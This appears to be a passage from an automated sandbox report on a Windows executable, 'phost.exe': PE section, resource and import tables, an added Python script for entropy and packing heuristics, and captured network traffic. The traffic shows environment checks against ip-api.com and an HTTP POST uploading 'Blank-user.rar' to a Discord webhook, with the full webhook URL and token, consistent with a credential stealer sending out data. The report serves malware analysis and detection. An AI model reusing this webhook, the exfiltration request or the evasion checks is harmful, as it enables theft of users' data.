IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Note: the SECURITY entry (Authenticode certificate table) is the one directory whose "Virtual Address" is a raw file offset rather than an RVA, which is why it maps to no section; 0x775c5c lies far past the end of the last section (.reloc, 0x4b000 + 0x800 raw), so the certificate data sits in the overlay appended after the sections.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f70 | 0x2a000 | b8c3814c5fb0b18492ad4ec2ffe0830a | False | 0.5518740699404762 | data | 6.489205819736506 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a28 | 0x12c00 | 6118b3c9155206deefa2f382d4c72980 | False | 0.5243229166666666 | data | 5.750765168350593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2238 | 0x2400 | 9cd1eac931545f28ab09329f8bfce843 | False | 0.4697265625 | data | 5.2645170849678795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x327c | 0x3400 | 141d1b5390a493815cc6b39414748958 | False | 0.8285006009615384 | data | 7.472807445255008 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4b000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x47250 | 0x1c1 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.024498886414254
RT_ICON | 0x47414 | 0x20c | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0209923664122138
RT_ICON | 0x47620 | 0x273 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0175438596491229
RT_ICON | 0x47894 | 0x434 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0102230483271375
RT_ICON | 0x47cc8 | 0x53e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.0081967213114753
RT_ICON | 0x48208 | 0x9b9 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | | | 1.004419445560466
RT_ICON | 0x48bc4 | 0xdc3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.930456996877661
RT_GROUP_ICON | 0x49988 | 0x68 | data | | | 0.7403846153846154
RT_VERSION | 0x499f0 | 0x37c | data | | | 0.4742152466367713
RT_MANIFEST | 0x49d6c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
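The Entropy, ZLIB Complexity and Xored PE columns in the section and resource tables above are the three cheapest packing and obfuscation heuristics in the report. The script below is an added example, not the sandbox's own code, showing how to compute equivalent metrics over a section's raw bytes. It assumes ZLIB Complexity means compressed size divided by raw size (consistent with the values above 1.0 on the already-deflated PNG icons) and that Xored PE means the DOS-stub string of an embedded PE found under a non-zero single-byte XOR key. All sample buffers are constructed and are not taken from phost.exe.

```python
"""Section-level packing heuristics: Shannon entropy, zlib compressibility and a
single-byte-XOR scan for an embedded PE.  Added example, not the sandbox's own
implementation; "ZLIB Complexity" = compressed size / raw size is an assumption."""
import math
import random
import zlib
from collections import Counter
from typing import Optional

DOS_STUB = b"This program cannot be run in DOS mode"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, close to 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def zlib_ratio(data: bytes) -> float:
    """compressed / raw size.  Near or above 1.0 means already compressed or
    encrypted (the PNG icons above exceed 1.0); tiny values mean zero padding."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def find_xored_pe(data: bytes) -> Optional[int]:
    """Single-byte XOR key under which the DOS-stub string appears in data.
    0 means a plaintext PE is embedded; None means no PE stub under any key."""
    for key in range(256):
        needle = bytes(b ^ key for b in DOS_STUB)
        if needle in data:
            return key
    return None


def classify_section(name: str, data: bytes) -> dict:
    """Combine the three metrics the way an analyst reads the table above."""
    ent = shannon_entropy(data)
    ratio = zlib_ratio(data)
    key = find_xored_pe(data)
    # Thresholds are an assumption: high entropy AND near-incompressible is the
    # packed/encrypted signature; entropy alone false-positives on PNG resources.
    packed_like = ent > 7.0 and ratio > 0.95
    return {
        "name": name,
        "entropy": round(ent, 3),
        "zlib_ratio": round(ratio, 3),
        "xor_key": key,
        "packed_like": packed_like,
        "xored_pe": key not in (None, 0),
    }


def build_samples() -> dict:
    """Constructed sample 'sections' (deterministic, not from the analysed file)."""
    rng = random.Random(1337)
    padded = b"\x00" * 4096                              # zero-filled, .data style
    random_blob = rng.randbytes(65536)                   # encrypted/packed style
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB + b".\r\n$"
    xored = bytes(b ^ 0x5A for b in fake_pe)             # PE hidden under key 0x5A
    carrier = b"A" * 1024 + xored + b"A" * 1024
    plain_pe = b"B" * 512 + fake_pe + b"B" * 512         # unobfuscated embedded PE
    return {"padded": padded, "random": random_blob,
            "xored": carrier, "plain_pe": plain_pe}


if __name__ == "__main__":
    for section_name, blob in build_samples().items():
        print(classify_section(section_name, blob))
```

Read the two numbers together rather than in isolation: .rsrc above has entropy 7.47, but its contents are PNG icons, so the high entropy is expected and its 0.83 ratio comes from the compressible group-icon, version, manifest and directory data rather than from a packed payload. A section that is both high-entropy and refuses to compress (ratio close to 1.0) and that carries executable characteristics is the combination worth treating as packed.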
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll | (no named imports listed)
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 08:41:47.230992079 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:41:47.350903988 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:41:47.351010084 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:41:47.351142883 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:41:47.470921993 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:41:48.512181997 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:41:48.520612001 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:41:48.641140938 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:41:48.642779112 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:41:49.208304882 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:41:49.208439112 CET | 49731 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:41:49.328583956 CET | 80 | 49731 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:42:26.797750950 CET | 49744 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:42:26.917622089 CET | 80 | 49744 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:42:26.917743921 CET | 49744 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:42:26.917862892 CET | 49744 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:42:27.037640095 CET | 80 | 49744 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:42:28.033027887 CET | 80 | 49744 | 208.95.112.1 | 192.168.2.4
Dec 13, 2024 08:42:28.074959993 CET | 49744 | 80 | 192.168.2.4 | 208.95.112.1
Dec 13, 2024 08:42:28.354499102 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:28.354542971 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:28.354615927 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:28.385469913 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:28.385550022 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.765423059 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.766010046 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.766048908 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.767750025 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.767828941 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.769478083 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.769583941 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.769779921 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.769790888 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.769848108 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.769877911 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.770032883 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.770070076 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
Dec 13, 2024 08:42:29.770374060 CET | 49745 | 443 | 192.168.2.4 | 162.159.137.232
Dec 13, 2024 08:42:29.770423889 CET | 443 | 49745 | 162.159.137.232 | 192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770591021 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770611048 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770633936 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770653963 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770682096 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770701885 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770797968 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770812035 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770814896 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770824909 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770827055 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770839930 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770878077 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.770890951 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771024942 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771037102 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771054983 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771063089 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771074057 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771080971 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771095991 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771111965 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771131992 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771141052 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771150112 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771155119 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771167040 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771173954 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771190882 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771198034 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771219015 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771228075 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771240950 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771254063 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771372080 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771380901 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771401882 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771414995 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771425962 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771486044 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771509886 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771554947 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771593094 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771635056 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771687031 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771694899 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771720886 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771750927 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771769047 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771790981 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771852970 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771902084 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771960974 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.771986008 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819338083 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819545031 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819628954 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819679976 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819699049 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819740057 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819758892 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819789886 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819804907 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819828033 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819840908 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819909096 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819909096 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819942951 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.819983006 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.820015907 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:29.867343903 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.282226086 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.282422066 CET44349745162.159.137.232192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.282615900 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.283201933 CET49745443192.168.2.4162.159.137.232
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.293102980 CET4974480192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.413587093 CET8049744208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Dec 13, 2024 08:42:31.413657904 CET4974480192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 08:41:45.249258041 CET | 58138 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 08:41:45.465985060 CET | 53 | 58138 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 08:41:47.088649988 CET | 53248 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 08:41:47.226730108 CET | 53 | 53248 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 08:42:26.657067060 CET | 63721 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 08:42:26.796803951 CET | 53 | 63721 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 08:42:28.215502977 CET | 57493 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 08:42:28.352855921 CET | 53 | 57493 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 08:41:45.249258041 CET | 192.168.2.4 | 1.1.1.1 | 0x214b | Standard query (0) | blank-c9yfy.in | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:41:47.088649988 CET | 192.168.2.4 | 1.1.1.1 | 0xe0a4 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:26.657067060 CET | 192.168.2.4 | 1.1.1.1 | 0x17f8 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:28.215502977 CET | 192.168.2.4 | 1.1.1.1 | 0x6fb6 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 08:41:45.465985060 CET | 1.1.1.1 | 192.168.2.4 | 0x214b | Name error (3) | blank-c9yfy.in | none | none | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:41:47.226730108 CET | 1.1.1.1 | 192.168.2.4 | 0xe0a4 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:26.796803951 CET | 1.1.1.1 | 192.168.2.4 | 0x17f8 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:28.352855921 CET | 1.1.1.1 | 192.168.2.4 | 0x6fb6 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:28.352855921 CET | 1.1.1.1 | 192.168.2.4 | 0x6fb6 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:28.352855921 CET | 1.1.1.1 | 192.168.2.4 | 0x6fb6 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:28.352855921 CET | 1.1.1.1 | 192.168.2.4 | 0x6fb6 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:42:28.352855921 CET | 1.1.1.1 | 192.168.2.4 | 0x6fb6 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 208.95.112.1 | 80 | 3444 | C:\Users\user\Desktop\phost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 08:41:47.351142883 CET | 117 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Accept-Encoding: identity
    User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:41:48.512181997 CET | 175 | IN | HTTP/1.1 200 OK
    Date: Fri, 13 Dec 2024 07:41:48 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49744 | 208.95.112.1 | 80 | 3444 | C:\Users\user\Desktop\phost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 08:42:26.917862892 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
    Accept-Encoding: identity
    User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:42:28.033027887 CET | 381 | IN | HTTP/1.1 200 OK
    Date: Fri, 13 Dec 2024 07:42:27 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 204
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49745 | 162.159.137.232 | 443 | 3444 | C:\Users\user\Desktop\phost.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-13 07:42:29 UTC | 302 | OUT | POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1
    Host: discord.com
    Accept-Encoding: identity
    Content-Length: 759276
    User-Agent: python-urllib3/2.2.3
    Content-Type: multipart/form-data; boundary=d86edcfe5e1bf83a434b434f5a1b347a
2024-12-13 07:42:29 UTC | 16384 | OUT | Data Ascii: --d86edcfe5e1bf83a434b434f5a1b347a
    Content-Disposition: form-data; name="file"; filename="Blank-user.rar"
    Content-Type: application/octet-stream
    Rar! (RAR archive signature; binary archive body follows)
2024-12-13 07:42:31 UTC | 1257 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 13 Dec 2024 07:42:31 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    Cache-Control: public, max-age=3600, s-maxage=3600
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1734075752
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bba3f1%2FZudwJQkFnKMdEqfZPnm6iBU18h3o3V9HzDakAlD5TEPANc%2BJkkp4mRZbicFS%2BglfWhSxd5p311G2JhLOYuxaDo7M3Dq5SOiR%2BQaH2o1Dt9emz1wTDcHLh"}],"group":"cf-nel","max_age":604800}
